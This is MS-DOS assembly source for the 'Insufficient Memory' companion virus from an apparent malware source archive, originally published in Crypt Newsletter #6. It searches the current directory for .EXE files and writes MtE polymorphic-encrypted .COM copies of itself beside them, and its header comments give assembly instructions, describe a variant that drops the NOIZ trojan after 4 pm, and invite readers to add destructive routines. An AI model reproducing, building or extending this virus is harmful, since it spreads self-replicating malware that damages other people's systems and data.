MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.insuff.asm
2021-01-12 17:44:11 -06:00

179 lines
6.8 KiB
NASM

;INSUFFICIENT MEMORY virus - by URNST KOUCH for Crypt Newsletter #6
;INSUFF MEMO is a simple MUTATION ENGINE loaded spawning virus, which
;confines itself to the current directory. To assemble with TASM 2.5, user
;must have complete MTE091B software package (including RND.OBJ,
;MTE.OBJ and stubfile, NOPS.BIN). Use MAKE2.BAT included in this
;issue of the Crypt Newsletter to assemble all proper
;components. Observant readers will notice INSUFF MEMO takes advantage of
;VCL 1.0 code as well as notation from the SARA virus. INSUFF MEMO is
;a non-threatening, unique example of an MtE-loaded companion virus -
;the only one in circulation, in fact.
;
;INSUFF2, included as a DEBUG script in this newsletter, is functionally
;identical to this virus. However, for those who 'require' a destructive
;program for their full enjoyment, it is loaded with a routine which
;simple checks the system time and branches to some 'dropper' code if
;after quitting time (4:00 pm). The 'dropper' reads from a data table
;and writes the NOIZ trojan to any .EXE in the current directory. By
;looking carefully at this code, several areas where 'potentially'
;destructive/nuisance routines can be added will suggest themselves.
;We do not include them for a number of reasons: 1) they are easy to
;come by in any number of books on assembly coding, the VCL 1.0 (an
;excellent source), or source code archives on mnay BBS's, and; 2)
;it allows you to get creative if you want and tinker (like I do all the
; time) with the basic layout of virus source.
;
;INSUFF3's source listing is modified to allow the virus to jump out
;of the current directory when all files in it are infected. The
;listing is publicly available at the BBS's listed at the end of the
;Crypt newsletter.
.model tiny
.radix 16
.code
extrn mut_engine: near
extrn rnd_buf: word, data_top: near
org 100
start:
call locadr
reladr:
db 'Insufficient memory'
locadr:
pop dx
mov cl,4
shr dx,cl
sub dx,10
mov cx,ds
add cx,dx ;Calculate new CS
mov dx,offset begin
push cx dx
retf
begin:
cld
mov di,offset start
push es di ;
push cs ;A carry over from the DAV
pop ds ;SARA virus, something of a curiosity
;in this companion virus
mov dx,offset dta_buf ;Set DTA
mov ah,1a
int 21
mov ax,3524 ;Hook INT 24, error handler
int 21 ;see bottom of code
push es bx
mov dx,offset fail_err
mov ax,2524
int 21
xor ax,ax ;Initialize random seed for MtE
mov [rnd_buf],ax ;could be coded, mov cs:[rnd_buf],0
push sp ;process necessary for generation of
pop cx ;MtE encryption key - see MtE docs
sub cx,sp ;for further notation
add cx,4
push cx
mov dx,offset srchnam ;EXE file-mask for spawn-name search
mov cl,3
mov ah,4e ; DOS find first file function
find_a_file:
int 021h
jc infection_done ; Exit if no files found
jmp infect ; Infect the file!
jnc infection_done ; Exit if no error
findr: mov ah,04Fh ; DOS find next file function
jmp find_a_file ; Try finding another file
infection_done:
mov ax,4C00h ;terminate
int 21h
infect:
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop:
lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
transfer_end:
mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc findr ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 21h
xchg bx,ax ; BX holds file handle
push dx cx
mov ax,offset data_top+0Fh
mov cl,4
shr ax,cl
mov cx,cs
add ax,cx
mov es,ax
mov dx,offset start ; DX points to start of virus
mov cx,offset _DATA ; CX holds virus length for encryption
push bp bx
mov bp,0100h ;tells MtE decryption routine will
xor si,si ;hand over control to where virus adds
xor di,di ;itself to 'infected' file, in this case offset
mov bl,0Fh ;0100h .. set si/di to 0, bl to 0Fh, all required
mov ax,101 ;set bit-field in ax
call mut_engine ;call the Mutation Engine to do its thing
pop bx ax
add ax,cx
neg ax
xor ah,ah
add ax,cx
mov ah,040h ;write encrypted virus to newly created file
int 21h
mov ah,03Eh ;close the file
int 21h
cmp byte ptr [set_carry],1
jmp infection_done ;move to end game
fail_err: ;Critical error handler
mov al,3 ;prevents virus from producing
iret ;messages on write-protected disks.
;Not handed back to machine when virus exits.
srchnam db '*.EXE',0 ;File-mask for 'spawn-search.'
.data
dta_buf db 2bh dup(?) ; Buffer for DTA
spawn_name db 12,12 dup (?),13 ; Name for next spawn
set_carry db ? ; Set-carry-on-exit flag
end start